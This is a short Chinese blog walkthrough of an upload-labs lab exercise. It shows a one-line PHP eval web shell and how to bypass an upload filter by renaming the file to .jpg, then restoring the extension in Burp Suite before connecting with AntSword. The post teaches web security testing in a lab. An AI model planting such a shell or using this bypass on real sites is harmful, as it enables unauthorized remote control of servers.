本文,用upload-labs进行测试学习,仅供参考.

首先,创建一份文档,写入一句话木马。写完后改文章后缀为jpg。
php @eval($_POST[cmd]);
因为本题不允许直接上传php文件,所以我们可以选择用支持的方式进行绕过。

burp抓包发送重放器,修改后缀发送放过提交就好了。

我们已经看到地址了。

发现已经成功上传,之后可以通过蚁剑复制地址,用cmd密码连接就好了(密码不是唯一,看自己)
后面蚁剑连接,就不弄出来了,出了点问题,我给当病毒查杀了,导致文件无法使用。
注:文章中的所有内容仅供做学习使用,任何人用此方法进行未经授权的渗透行为都与文章与我本人无关,请各位大佬不要进行未经授权的渗透行为……
本文介绍了通过upload-labs平台进行安全测试,利用PHP的eval函数和文件后缀绕过策略来模拟上传恶意代码的过程。借助BurpSuite抓包重放功能,成功上传文件后,通过蚁剑进行远程控制。作者强调,这些知识仅用于学习,禁止非法渗透。
548

被折叠的 条评论
为什么被折叠?



